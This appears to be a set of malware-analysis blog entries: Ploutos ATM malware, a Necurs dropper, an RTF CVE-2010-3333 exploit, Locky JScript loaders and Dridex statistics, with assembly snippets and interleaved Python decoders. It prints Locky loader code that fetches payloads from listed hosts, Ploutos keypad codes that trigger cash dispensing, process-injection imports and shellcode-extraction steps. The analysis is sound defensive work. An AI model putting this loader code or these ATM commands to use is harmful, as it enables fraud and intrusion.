                ExitProcess,'ExitProcess',\
                OpenProcess,'OpenProcess',\
                VirtualAllocEx, "VirtualAllocEx",\
                WriteProcessMemory,'WriteProcessMemory'
 
import          user32,\
                FindWindow,'FindWindowA',\
                GetWindowThreadProcessId,'GetWindowThreadProcessId',\
                MessageBox,'MessageBoxA'


IV. Copy a file


format PE GUI 4.0
entry start
 
include 'win32ax.inc'
 
;================== code =====================
section '.code' code readable executable
;=============================================
 
proc start
        mov [lpFileOp.wFunc],FO_COPY             ; We want the shell to copy a file
        mov [lpFileOp.fFlags],FOF_SILENT         ; .. silently
        mov [lpFileOp.pFrom],SzFileFrom          ; The file which is going to be copied
        mov [lpFileOp.pTo],SzFileTo              ; The name of the new file
 
        invoke SHFileOperationA,lpFileOp         ; Execute the operation
 
        invoke ExitProcess,NULL                  ; Exit this program
endp
 
;=================== data ====================
section '.data' data readable writeable
;=============================================
 
FO_COPY    = 2
FOF_SILENT = 4
SzFileFrom db 'source.txt',0,0           ; pFrom and pTo are double-null-terminated lists
SzFileTo   db 'target.txt',0,0
 
struct  SHFILEOPSTRUCT
        hWnd dd ?
        wFunc dd ?
        pFrom dd ?                       ; Pointer to the source list, filled in at run time
        pTo dd ?
        fFlags dw ?                      ; A WORD, packed directly before the BOOL on 32-bit Windows
        fAnyOperationsAborted dd ?
        hNameMappings dd ?
        lpszProgressTitle dd ?
ends
 
lpFileOp SHFILEOPSTRUCT
 
;=============================================
section '.idata' import data readable
;=============================================
 
library         kernel32,'KERNEL32.DLL',\
                shell32,'SHELL32.DLL'
 
import          kernel32,\
                ExitProcess,'ExitProcess'
 
import          shell32,\
                SHFileOperationA,'SHFileOperationA'

V.  Read a file

format pe console 4.0
include 'WIN32AX.INC'
 
BUFSIZE = 8192
 
.data
        FileTitle db 'file.txt',0
        hFile dd ?
        nSize dd ?
        lpBytesRead dd ?
        lpBuffer rb BUFSIZE+1           ; One extra byte for the terminating zero
 
        MessageBoxCaption db 'Output:',0
.code
        main:
        invoke  CreateFile, FileTitle, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 ; Open the file (to get its handle)
        cmp     eax, INVALID_HANDLE_VALUE
        je      .exit                   ; Could not open the file
        mov [hFile], eax ; Save the file's handle to hFile
        invoke  GetFileSize, [hFile], 0 ; Determine the file size
        cmp     eax, BUFSIZE
        jbe     @f
        mov     eax, BUFSIZE            ; Never ask for more than the buffer can hold
@@:
        mov [nSize], eax ; Save the (capped) number of bytes to read
        invoke  ReadFile, [hFile], lpBuffer, [nSize], lpBytesRead, 0 ; Now read the file
        invoke CloseHandle, [hFile] ; Handle should be closed after the file has been read
        mov     eax, [lpBytesRead]
        mov     byte [lpBuffer+eax], 0  ; Terminate the text so MessageBox stops at the bytes actually read
        invoke MessageBox, NULL, addr lpBuffer, addr MessageBoxCaption, MB_OK ; Easy way of outputting the text
.exit:
        invoke  ExitProcess, 0
 
.end main

VI. Write a file

format pe console 4.0
include 'WIN32AX.INC'
 
.data
 buf db 'TEST'
 bufsize = $ - buf
 byteswritten dd ?
 hFile dd ?
.code
 main:
 invoke  CreateFile, 'test.txt', GENERIC_WRITE, 0, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0 ; OPEN_ALWAYS (4): create the file if it does not exist
 mov     [hFile], eax                                                                        ; Keep the handle so it can be closed
 invoke  WriteFile, [hFile], buf, bufsize, byteswritten, 0
 invoke  CloseHandle, [hFile]
 invoke  ExitProcess, 0
 
.end main

Ploutos ATM Malware Analysis

Source: VirusTotal

 File identification
MD5 eca2ca8ecf63816d9a157888e3d871dc
SHA1 b0b13b336ee8770bb2a90fb1292fd9dcabd046f4
SHA256 d99339d3dc6891cdd832754c5739640c62cd229c84e04e9e3cad743c6f66b1b9

 FileVersionInfo properties
Copyright
Copyright © Ploutos 2013

Product Ploutos
Original name Ploutos.exe
Internal name Ploutos.exe
File version 1.0.0.0
Description Ploutos
 PE header basic information
Target machine Intel 386 or later processors and compatible processors
Compilation timestamp 2013-07-24 07:09:14
Entry Point 0x0000944E
Number of sections 3
 .NET details
Module Version ID b943871a-96c9-53f0-1673-9625474d13a6
 PE sections
 PE imports
[+] mscoree.dll
 Number of PE resources by type
RT_MANIFEST 1
RT_VERSION 1
 Number of PE resources by language
NEUTRAL 2

The command codes entered on the ATM keypad, and their purpose, are as follows:
  • 12340000: Tests whether the keyboard is receiving commands.
  • 12343570: Generates the ATM ID, which is stored in the DATAA entry of the config.ini file.
  • 12343571XXXXXXXX: Has two actions:
      • Activates the ATM ID by generating an activation code from the encoded ATM ID and the current date; the value is stored in the DATAC entry of the config.ini file. The eight bytes read in must be a valid encoded ATM ID generated by a function called CrypTrack(). A valid ATM activation code must be obtained before the ATM will dispense cash.
      • Generates a timespan: sets a timer to dispense money; the value is stored in the DATAB entry of the config.ini file.
  • 12343572XX: Commands the ATM to dispense money. The digits in place of XX represent the number of bills to dispense.

Malware Forensics: Necurs Dropper via NTSecureSys

Source: Immunity Debugger, IDA Pro



File: necurs_dropper[.]exe
Size: 97792 Bytes
MD5: 6B3D2D146E683DAF0DEB906D57393E22

Mutex:
Name *    
————————————————–
   Instance0:  ESENT Performance Data Schema Version 40  

Ports:
Port    PID    Type    Path    
————————————————–

  • 3417    2688 TCP    C:\Documents and Settings\Administrator\Desktop\dropper[.]exe    
  • 3418    3536 TCP    C:\Documents and Settings\Administrator\Desktop\dropper[.]exe    
  • 3419    384 TCP    C:\Documents and Settings\Administrator\Desktop\dropper


API Logger (Interesting Calls):

  • 91222     CreateFileA(\\.\NtSecureSys)    
  • 912c6     GetCurrentProcessId()=2688
  • 771bd3a9     connect(69.50.214[.]54:80)

URLs (via GlobalAddAtomA API):
————————————————–
RegKeys (Anti-AV Check):
————————————————–

  • SUNBELT SOFTWARE
  • Sunbelt Software
  • G DATA Software
  • CJSC Returnil Software
  • Check Point Software Technologies Ltd
  • Panda Software International
  • FRISK Software International Ltd
  • ALWIL Software

Reversing Malicious RTF Document: MS10-087 Exploit CVE-2010-3333

Image 1: The maldoc titled “ANCALOG[.]doc” reveals RTF artifacts.
Goal: Practice reverse engineering RTF exploits. In this case, we analyze the infamous exploit for MS10-087 (CVE-2010-3333). This exploit was heavily used by various Chinese and Eastern European APT groups. The sample below was submitted from Poland on June 6, 2016.

I. Malware Sample: ANCALOG[.]doc
 Original Filename       ANCALOG[.]doc
MD5 4483ad299158eb54f6ff58b5346a36ee
SHA-1 7551c2d2c1b3271cecab6fc803626bc3d505aacd
SHA-256 97913941fb149e85d76d82cb19a8045d0cf4f07f7addb91ea94081050e0693b2
ssdeep 48:mdTagznhm11D1Dl8NYYhpWo0FdzMwRH0dgw9h3WEQDT:mxB6VV5o0vH0dJD8T
Size 664.9 KB (680855 bytes)
Type Rich Text Format
Magic Rich Text Format data, version 1, unknown character set
TrID
Rich Text Format (100.0%)

Image 2-3: The list of all contents of the RTF maldoc as displayed by rtfdump.
Command Sequence:
I. python2.7 rtfdump.py -y rtf.yara 97913941fb149e85d76d82cb19a8045d0cf4f07f7addb91ea94081050e0693b2

Image 4: The maldoc scan by the RTF Yara ruleset reveals various signs of exploitation inside the maldoc.


II. python2.7 rtfdump.py -s 337677 97913941fb149e85d76d82cb19a8045d0cf4f07f7addb91ea94081050e0693b2 

Image 5: The rtfdump script reveals the encoded payload inside the maldoc.


III. python2.7 rtfdump.py -s 338677 -H ../97913941fb149e85d76d82cb19a8045d0cf4f07f7addb91ea94081050e0693b2 

Image 6: The hexadecimal-decoded values reveal six sequential NOP instructions (a NOP sled, often used to set the stage for the shellcode) at "0x35" and the "cmd" script at the end.


IV. python2.7 rtfdump.py -s 338677 -H -c "0x35:" -d ../97913941fb149e85d76d82cb19a8045d0cf4f07f7addb91ea94081050e0693b2 > shellcode.bin
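To see what steps II and III do under the hood, here is an added example (my own code, not rtfdump and not the post's script): it walks the RTF for the {\*\objdata ...} group, decodes the hex the way rtfdump -H does (skipping whitespace and line breaks), reads the OLE 1.0 class name, and checks the object and the RTF text against the byte signature of rule RTF_Object and the "pFragments" string of rule pFragments. The RTF it parses is a constructed sample embedded inline; the only real values in it are those two signatures.

```python
"""Decode an RTF \\objdata object and triage it with the page's YARA signatures.

Added example: not rtfdump and not the post's own code. SAMPLE_RTF is a
constructed document; RTF_OBJECT_SIG and PFRAGMENTS come from the YARA rules
on the page. The OLE 1.0 layout assumed after the 8-byte header is a
4-byte little-endian class-name length followed by the NUL-terminated name.
"""
import binascii
import re
import struct

RTF_OBJECT_SIG = bytes.fromhex("0105000002000000")   # rule RTF_Object: OLE 1.0 header
PFRAGMENTS = "pFragments"                             # rule pFragments
NON_HEX = re.compile(r"[^0-9A-Fa-f]")

# Constructed sample RTF: a shape property named pFragments in the RTF text,
# plus one embedded object whose hex data is an OLE 1.0 header, the class
# name "Package" and a marker string. Whitespace and newlines inside the hex
# are deliberate; Word writes it that way and the decoder must skip them.
SAMPLE_RTF = r"""{\rtf1\ansi\deff0{\fonttbl{\f0 Arial;}}
{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1;0000}}}}
{\object\objemb{\*\objdata 0105000002000000 08000000
5061636b61676500 00000000 00000000 0a000000
7046726167 6d656e7473}}
\par constructed}"""


def objdata_groups(rtf: str) -> list:
    """Return the raw text inside every {\\*\\objdata ...} group (braces balanced)."""
    groups = []
    for m in re.finditer(r"\\\*\\objdata", rtf):
        depth, i = 1, m.end()          # we are inside the group that holds \objdata
        start = i
        while i < len(rtf) and depth:
            if rtf[i] == "{":
                depth += 1
            elif rtf[i] == "}":
                depth -= 1
            i += 1
        end = i - 1 if depth == 0 else i   # drop the closing brace if we saw it
        groups.append(rtf[start:end])
    return groups


def decode_hex(text: str) -> bytes:
    """Hex-decode like rtfdump -H: every non-hex character is ignored."""
    clean = NON_HEX.sub("", text)
    clean = clean[: len(clean) - len(clean) % 2]   # drop a dangling nibble instead of failing
    return binascii.unhexlify(clean)


def ole1_class_name(data: bytes):
    """Class name that follows the OLE 1.0 header, or None if the header is absent."""
    if not data.startswith(RTF_OBJECT_SIG) or len(data) < 12:
        return None
    (n,) = struct.unpack_from("<I", data, 8)
    return data[12:12 + n].rstrip(b"\x00").decode("latin-1", "replace")


def triage(rtf: str) -> dict:
    """Decode each embedded object and report the hits an analyst looks for first."""
    objects = []
    for raw in objdata_groups(rtf):
        data = decode_hex(raw)
        objects.append({
            "size": len(data),
            "ole1_header": data.startswith(RTF_OBJECT_SIG),
            "class_name": ole1_class_name(data),
            "pFragments_in_object": PFRAGMENTS.encode() in data,
            "data": data,
        })
    return {"pFragments_in_rtf": PFRAGMENTS in rtf, "objects": objects}


if __name__ == "__main__":
    report = triage(SAMPLE_RTF)
    print("pFragments in RTF text:", report["pFragments_in_rtf"])
    for obj in report["objects"]:
        print(obj["size"], "bytes, OLE1 header:", obj["ole1_header"],
              "class:", obj["class_name"], "pFragments:", obj["pFragments_in_object"])
```

On the real sample, replace SAMPLE_RTF with the file contents and dump obj["data"] to disk; that is the same bytes rtfdump -s ... -H -d writes, which the -c "0x35:" cut then trims to the shellcode.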

Yara RTF Maldoc Signature:

rule includepicture_http
{
    meta:
        author = "Didier Stevens (https://DidierStevens.com)"
    strings:
        $a1 = "INCLUDEPICTURE"
        $a2 = "http" nocase
    condition:
        $a1 and $a2
}
rule ListView2_CLSID
{
    meta:
        author = "Didier Stevens (https://DidierStevens.com)"
    strings:
        $a1 = {4B F0 D1 BD 8B 85 D1 11 B1 6A 00 C0 F0 28 36 28}
    condition:
        any of them
}
rule http
{
    meta:
        author = "Didier Stevens (https://DidierStevens.com)"
    strings:
        $a1 = "http" nocase
    condition:
        $a1
}
rule RTF_Object
{
    meta:
        author = "Didier Stevens (https://DidierStevens.com)"
    strings:
        $a1 = {01 05 00 00 02 00 00 00}
    condition:
        any of them
}
rule pFragments
{
    meta:
        author = "Didier Stevens (https://DidierStevens.com)"
    strings:
        $a1 = "pFragments"
    condition:
        $a1
}


Trojan-Downloader:JS/Locky: Deobfuscate and Extract IOCs

Source: https://www.flashpoint-intel.com/anatomy-locky-zepto-ransomware/
Goal: Assist analysts with decoding and obtaining relevant information from Locky HTML Application (HTA) and Windows Script File (WSF) JSCRIPT loaders.

GitHub repo: https://github.com/vkremez/Locky/blob/master/README.md

Locky ransomware was notorious for its usage of the second-stage JavaScript and Windows Script File JSCRIPT in its spray-and-pray attacks.

These are classic simple XOR-ed .wsf/.hta SCRIPT payloads used by this gang.

For example, let’s take a look at the following Locky HTA JSCRIPT loader:
  • 3d91a6ffed8b038363a0ead0f8985d1bdf88ba543aff0bcab048819d70455073.jscript.

Padding word:
  • LICIZAX
XOR Key:
  • b6vYxEjsTYwJ7mIrZz4WFSGHeaddkwbq

Payload URIs (remove the padding word and decode the Base64):
  • goldenladywedding[.]com/vdG76VUY76rjnu?CHhjpz=zhXHhhwS
  • www[.]jmetalloysllp[.]com/vdG76VUY76rjnu?CHhjpz=zhXHhhwS
  • livewebsol[.]com/vdG76VUY76rjnu?CHhjpz=zhXHhhwS
Filename in %TEMP%/AppData/ (launched by rundll32.exe with 'qwerty'):

  • NqmXYsBdh[.]dll
Here is the relevant function right below the eval() one:

var brigadabrigadalalapolicMOTALO2HORDA17 = "NqmXYsBdh";
var brigadabrigadalalapolicTRAxKey = brigadabrigadalalapolicMOTALO2fsta("b6vYxEjsTYwJ7mIrZz4WFSGHeaddkwbq");
var brigadabrigadalalapolicMOTALO2_a5 = ["Z29sZGVubGFkeLICIZAXXdlZGRpbmcuY29tL3ZkRzc2VlVZNzZyam51", "dLICIZAX3d3LmptZXRhbGxveXNsbHAuYLICIZAX29tL3ZkRzc2VlVZNzZyam51", "bGl2ZXdlYnNvbC5jb20vdmRHLICIZAXNzZWVVk3NnJqbnU="];
var brigadabrigadalalapolicMOTALO2HORDAI = 0;
for (brigadabrigadalalapolicMOTALO2HORDA5 in brigadabrigadalalapolicMOTALO2_a5) {
    brigadabrigadalalapolicMOTALO2HORDAI++;
    try {
        var brigadabrigadalalapolicMOTALO2HORDA6 = brigadabrigadalalapolicMOTALO2_bChosteck.brigadabrigadalalapolicMRADXHO() + brigadabrigadalalapolicMOTALO2_a5[brigadabrigadalalapolicMOTALO2HORDA5].brigadabrigadalalapolicMRADXHO() + "?CHhjpz=zhXHhhwS";
        if (brigadabrigadalalapolicMOTALO2_a2(brigadabrigadalalapolicMOTALO2HORDA6, brigadabrigadalalapolicMOTALO2HORDA17 + brigadabrigadalalapolicMOTALO2HORDAI)) {
            break;

Please take a look at the following GitHub page with the Python script to decode Locky JSCRIPT loaders and obtain payload indicators of compromise:
https://github.com/vkremez/Locky/blob/master/README.md
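As an added, self-contained illustration of the decoding described above (my own code, not the script in the GitHub repository and not the loader's code), the following takes the padding word, the Base64 array and the query string exactly as they appear in the loader fragment, strips the padding, decodes the URIs and defangs them for reporting. It also carries the XOR key from the post; the xor_decode routine assumes a byte-wise repeating-key XOR, which is my reading of "simple XOR-ed" and is demonstrated only on a constructed byte string, not on a real payload.

```python
"""Recover the payload URIs from the Locky JSCRIPT loader fragment above.

Added example, not the author's decoder and not the loader itself. The
padding word, XOR key, Base64 array and query string are copied from the
post; the repeating-key XOR layout is an assumption and the bytes it is
shown on are constructed.
"""
import base64
from typing import List

PADDING_WORD = "LICIZAX"
XOR_KEY = b"b6vYxEjsTYwJ7mIrZz4WFSGHeaddkwbq"
QUERY = "?CHhjpz=zhXHhhwS"

# Base64 array copied verbatim from the loader fragment (padding word spliced in).
ENCODED_URIS = [
    "Z29sZGVubGFkeLICIZAXXdlZGRpbmcuY29tL3ZkRzc2VlVZNzZyam51",
    "dLICIZAX3d3LmptZXRhbGxveXNsbHAuYLICIZAX29tL3ZkRzc2VlVZNzZyam51",
    "bGl2ZXdlYnNvbC5jb20vdmRHLICIZAXNzZWVVk3NnJqbnU=",
]


def strip_padding(s: str, word: str = PADDING_WORD) -> str:
    """Remove every occurrence of the padding word that was spliced into the Base64."""
    return s.replace(word, "")


def decode_uri(enc: str) -> str:
    """Padding word out, Base64 decoded, query string appended, as the loader builds it."""
    b64 = strip_padding(enc)
    b64 += "=" * (-len(b64) % 4)        # restore '=' padding if the splice damaged it
    return base64.b64decode(b64).decode("ascii") + QUERY


def defang(uri: str) -> str:
    """Neutralise the indicator for a report: dots in the host part become [.]."""
    host, sep, rest = uri.partition("/")
    return host.replace(".", "[.]") + sep + rest


def xor_decode(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR (assumed layout); the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def extract_iocs() -> List[str]:
    """Defanged payload URIs in the order the loader tries them."""
    return [defang(decode_uri(e)) for e in ENCODED_URIS]


if __name__ == "__main__":
    for ioc in extract_iocs():
        print(ioc)
    # Constructed demonstration bytes: a fake MZ header, scrambled and recovered.
    sample = b"MZ\x90\x00constructed-sample-payload"
    print(xor_decode(xor_decode(sample)) == sample)
```

The three decoded hosts match the IOCs listed above; for a new sample, swap in its padding word, key and array, and the rest of the script stays the same.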

Let's Learn: MITRE's CRITs Threat Intelligence Platform in Docker

Source: https://crits.github.io/
Requirements: Docker, MongoDB
Docker Image: https://hub.docker.com/r/remnux/crits/

I. Install the CRITs Threat Intelligence Platform (TIP) image via Kitematic;
II. Verify the container status via the Kitematic panel;
III. Browse to the local panel, which is set up by default on port 8443; and
IV. Log in using the default credentials.
Addendum: Additional Debug Information:

2017-01-17 07:15:17,244 CRIT Set uid to user 999
2017-01-17 07:15:17,307 INFO RPC interface 'supervisor' initialized
2017-01-17 07:15:17,309 CRIT Server 'unix_http_server' running without any HTTP authentication checking
2017-01-17 07:15:17,309 INFO supervisord started with pid 5
2017-01-17 07:15:18,317 INFO spawned: 'mongod' with pid 9
2017-01-17 07:15:18,320 INFO spawned: 'apache2' with pid 10
2017-01-17 07:15:19,522 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:15:19,523 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
about to fork child process, waiting until server is ready for connections.
forked process: 86
ERROR: child process failed, exited with error number 48
2017-01-17 07:18:00,443 CRIT Set uid to user 999
Unlinking stale socket /data/run/supervisor.sock
2017-01-17 07:18:01,161 INFO RPC interface 'supervisor' initialized
2017-01-17 07:18:01,177 CRIT Server 'unix_http_server' running without any HTTP authentication checking
2017-01-17 07:18:01,216 INFO supervisord started with pid 5
2017-01-17 07:18:02,264 INFO spawned: 'mongod' with pid 9
2017-01-17 07:18:02,310 INFO spawned: 'apache2' with pid 10
2017-01-17 07:18:03,304 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:18:03,439 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:18:03,498 INFO exited: apache2 (exit status 0; expected)
about to fork child process, waiting until server is ready for connections.
forked process: 16
ERROR: child process failed, exited with error number 100
2017-01-17 07:19:03,085 CRIT Set uid to user 999
Unlinking stale socket /data/run/supervisor.sock
about to fork child process, waiting until server is ready for connections.
forked process: 12
2017-01-17 07:19:04,273 INFO RPC interface 'supervisor' initialized
2017-01-17 07:19:04,284 CRIT Server 'unix_http_server' running without any HTTP authentication checking
2017-01-17 07:19:04,336 INFO supervisord started with pid 5
2017-01-17 07:19:05,373 INFO spawned: 'mongod' with pid 15
2017-01-17 07:19:05,429 INFO spawned: 'apache2' with pid 16
2017-01-17 07:19:06,378 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:19:06,379 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:19:07,262 INFO spawned: 'mongod' with pid 19
2017-01-17 07:19:07,344 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:19:07,459 INFO exited: apache2 (exit status 0; expected)
2017-01-17 07:19:07,927 INFO spawned: 'apache2' with pid 22
2017-01-17 07:19:08,031 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:19:08,780 INFO exited: apache2 (exit status 0; not expected)
2017-01-17 07:19:09,879 INFO spawned: 'mongod' with pid 23
2017-01-17 07:19:09,892 INFO spawned: 'apache2' with pid 24
2017-01-17 07:19:10,579 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:19:10,997 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:19:11,034 INFO exited: apache2 (exit status 0; expected)
2017-01-17 07:19:12,058 INFO spawned: 'apache2' with pid 28
2017-01-17 07:19:12,669 INFO spawned: 'mongod' with pid 29
2017-01-17 07:19:12,757 INFO exited: apache2 (exit status 0; not expected)
2017-01-17 07:19:13,057 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:19:14,187 INFO spawned: 'apache2' with pid 32
child process started successfully, parent exiting
2017-01-17 07:19:15,672 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:19:16,678 INFO spawned: 'mongod' with pid 106
2017-01-17 07:19:17,108 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:19:18,115 INFO gave up: mongod entered FATAL state, too many start retries too quickly
Drop protection enabled. Will not drop existing content!
User Roles: added 3 roles!
Actions: added 2 actions!
Raw Data Types: added 2 types!
Signature Types: added 3 types!
Drop protection does not apply to effective TLDs
2017-01-17 07:20:59,999 CRIT Set uid to user 999
Unlinking stale socket /data/run/supervisor.sock
2017-01-17 07:21:00,999 INFO RPC interface 'supervisor' initialized
2017-01-17 07:21:01,002 CRIT Server 'unix_http_server' running without any HTTP authentication checking
2017-01-17 07:21:01,002 INFO supervisord started with pid 5
about to fork child process, waiting until server is ready for connections.
forked process: 12
2017-01-17 07:21:02,120 INFO spawned: 'mongod' with pid 15
2017-01-17 07:21:02,182 INFO spawned: 'apache2' with pid 16
2017-01-17 07:21:03,003 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:03,940 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:21:05,182 INFO spawned: 'mongod' with pid 21
2017-01-17 07:21:06,356 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:21:06,700 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:07,710 INFO spawned: 'mongod' with pid 79
2017-01-17 07:21:08,446 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:09,954 INFO spawned: 'mongod' with pid 82
2017-01-17 07:21:10,461 INFO exited: mongod (exit status 100; not expected)
child process started successfully, parent exiting
2017-01-17 07:21:12,476 INFO spawned: 'mongod' with pid 100
2017-01-17 07:21:13,709 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:21:13,838 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:14,939 INFO spawned: 'mongod' with pid 105
2017-01-17 07:21:15,292 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:16,333 INFO spawned: 'mongod' with pid 118
2017-01-17 07:21:16,636 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:18,797 INFO spawned: 'mongod' with pid 121
2017-01-17 07:21:19,256 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:22,270 INFO spawned: 'mongod' with pid 127
2017-01-17 07:21:22,537 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:23,549 INFO gave up: mongod entered FATAL state, too many start retries too quickly
Drop protection enabled. Will not drop existing content!
User Roles: existing documents detected. skipping!
Actions: existing documents detected. skipping!
Raw Data Types: existing documents detected. skipping!
Signature Types: existing documents detected. skipping!
Drop protection does not apply to effective TLDs
Effective TLDs: added 7789 TLDs!
Drop protection does not apply to location objects
Added 248 Location Objects.
Default Dashboard Created.
Creating a new CRITs configuration.
Creating indexes (duplicates will be ignored automatically)
User 'nonroot' created successfully!
Temp password: 
A CRITs configuration already exists. Skipping default creation.
Setting [allowed_hosts] to a value of [['localhost']]
Saving CRITs configuration.
To access CRITS user interface, go https://localhost:8443 and use the following credentials:
Username: nonroot
Password: 
Please change the temporary password upon successful login to the web interface by clicking on 'Nonroot User' near the top left panel and selecting 'Change Password'.
If changes made to the CRITs application require a restart of the web server, run 'service apache2 stop' and supervisor will automatically restart the web server for you.

Dridex Banker Statistics 2016-2017


Source: OSINT

Goal: Obtain statistics related to Dridex trends in 2016, including, but not limited to,

  • (1) a count of all known Dridex nodes 
  • (2) top 10 country infrastructure locations; and
  • (3) timeline histogram of node Dridex detections

Tool: Elasticsearch, Kibana, and Logstash (ELK)

Date Range: 2016-2017

Statistics:
(1) Dridex Count: 329
(2) Top 10 Country Infrastructure Location

Country (geoip.country_name.keyword, descending)    Count
United States 77
Germany 34
United Kingdom 28
France 17
Canada 10
Netherlands 9
Australia 8
Russia 8
Thailand 8
Bulgaria 7

(3) Timeline Histogram


Detection Time IOC geoip.country_name
December 26th 2016; 20:07:34 92.222.129.145 France
December 26th 2016; 20:07:34 91.103.2.132 Ireland
December 23rd 2016; 12:35:14 82.196.5.27 Netherlands
December 22nd 2016; 07:27:36 192.188.58.163 Ecuador
December 22nd 2016; 07:27:36 203.153.165.21 Thailand
December 22nd 2016; 07:27:36 109.74.9.119 Sweden
December 22nd 2016; 07:27:36 69.43.168.214 United States
December 17th 2016; 11:27:38 71.6.155.196 United States
December 17th 2016; 11:27:38 188.68.50.34 Germany
December 15th 2016; 08:55:30 212.200.111.170 Serbia
December 12th 2016; 08:21:30 192.241.236.239 United States
December 9th 2016; 05:23:36 188.120.249.30 Russia
November 21st 2016; 06:34:36 72.249.144.95 United States
November 18th 2016; 13:35:55 188.126.72.179 Sweden
November 18th 2016; 05:55:13 174.37.216.226 United States
November 18th 2016; 05:55:13 166.78.144.68 United States
November 16th 2016; 13:54:38 54.235.86.173 United States
November 15th 2016; 09:53:22 193.136.97.4 Portugal
November 15th 2016; 09:53:22 93.122.165.54 Romania
November 11th 2016; 09:09:04 87.254.45.29 Norway
November 11th 2016; 09:09:04 149.210.158.54 Netherlands
November 5th 2016; 17:01:33 216.127.161.5 United States
November 4th 2016; 04:51:51 77.111.90.85 Hungary
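The two aggregations the goal asks for, (2) the top-10 country terms aggregation and (3) the detection-time histogram, can be rebuilt outside Kibana from the exported rows. The following is an added example (my own code, not the author's ELK setup) that parses the timeline table above, including the ordinal day suffixes Kibana prints ("26th", "9th") that strptime cannot read directly, and aggregates the rows by country and by day. Its input is the page's own table, which is only an excerpt, so its counts are smaller than the 329-node figures the post reports for the full data set.

```python
"""Reproduce the Kibana country terms aggregation and date histogram from the
exported timeline rows.

Added example, not the author's ELK pipeline. ROWS is the timeline table
from the page (an excerpt, hence smaller counts than the page's totals).
"""
import re
from collections import Counter
from datetime import datetime

ROWS = """\
December 26th 2016; 20:07:34 92.222.129.145 France
December 26th 2016; 20:07:34 91.103.2.132 Ireland
December 23rd 2016; 12:35:14 82.196.5.27 Netherlands
December 22nd 2016; 07:27:36 192.188.58.163 Ecuador
December 22nd 2016; 07:27:36 203.153.165.21 Thailand
December 22nd 2016; 07:27:36 109.74.9.119 Sweden
December 22nd 2016; 07:27:36 69.43.168.214 United States
December 17th 2016; 11:27:38 71.6.155.196 United States
December 17th 2016; 11:27:38 188.68.50.34 Germany
December 15th 2016; 08:55:30 212.200.111.170 Serbia
December 12th 2016; 08:21:30 192.241.236.239 United States
December 9th 2016; 05:23:36 188.120.249.30 Russia
November 21st 2016; 06:34:36 72.249.144.95 United States
November 18th 2016; 13:35:55 188.126.72.179 Sweden
November 18th 2016; 05:55:13 174.37.216.226 United States
November 18th 2016; 05:55:13 166.78.144.68 United States
November 16th 2016; 13:54:38 54.235.86.173 United States
November 15th 2016; 09:53:22 193.136.97.4 Portugal
November 15th 2016; 09:53:22 93.122.165.54 Romania
November 11th 2016; 09:09:04 87.254.45.29 Norway
November 11th 2016; 09:09:04 149.210.158.54 Netherlands
November 5th 2016; 17:01:33 216.127.161.5 United States
November 4th 2016; 04:51:51 77.111.90.85 Hungary
"""

# Kibana prints ordinal day numbers; strptime has no directive for the suffix,
# so the regex peels "st/nd/rd/th" off before the timestamp is parsed. The
# country is everything after the IP, which keeps "United States" intact.
ROW_RE = re.compile(
    r"^(?P<month>[A-Z][a-z]+) (?P<day>\d{1,2})(?:st|nd|rd|th) (?P<year>\d{4}); "
    r"(?P<clock>\d{2}:\d{2}:\d{2}) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) (?P<country>.+)$"
)


def parse_row(line: str):
    """One exported row -> dict with a real datetime, or None if it does not match."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(
        f"{m['month']} {m['day']} {m['year']} {m['clock']}", "%B %d %Y %H:%M:%S"
    )
    return {"ts": ts, "ip": m["ip"], "country": m["country"]}


def parse_rows(text: str) -> list:
    """Parse every line, silently skipping headers or blank lines that do not match."""
    return [r for r in (parse_row(line) for line in text.splitlines()) if r]


def top_countries(rows, n: int = 10) -> list:
    """Equivalent of the terms aggregation on geoip.country_name.keyword, descending."""
    return Counter(r["country"] for r in rows).most_common(n)


def daily_histogram(rows) -> dict:
    """Equivalent of a date histogram with a one-day interval, oldest bucket first."""
    counts = Counter(r["ts"].date().isoformat() for r in rows)
    return dict(sorted(counts.items()))


if __name__ == "__main__":
    rows = parse_rows(ROWS)
    print("nodes:", len(rows))
    for country, n in top_countries(rows):
        print(f"{country:15} {n}")
    for day, n in daily_histogram(rows).items():
        print(day, "#" * n)
```

Feeding the full export into ROWS (or reading it from a file) gives the same shape of result as the Kibana panels; the IP column is kept on each row so the same parse can feed a blocklist or a lookup against other telemetry.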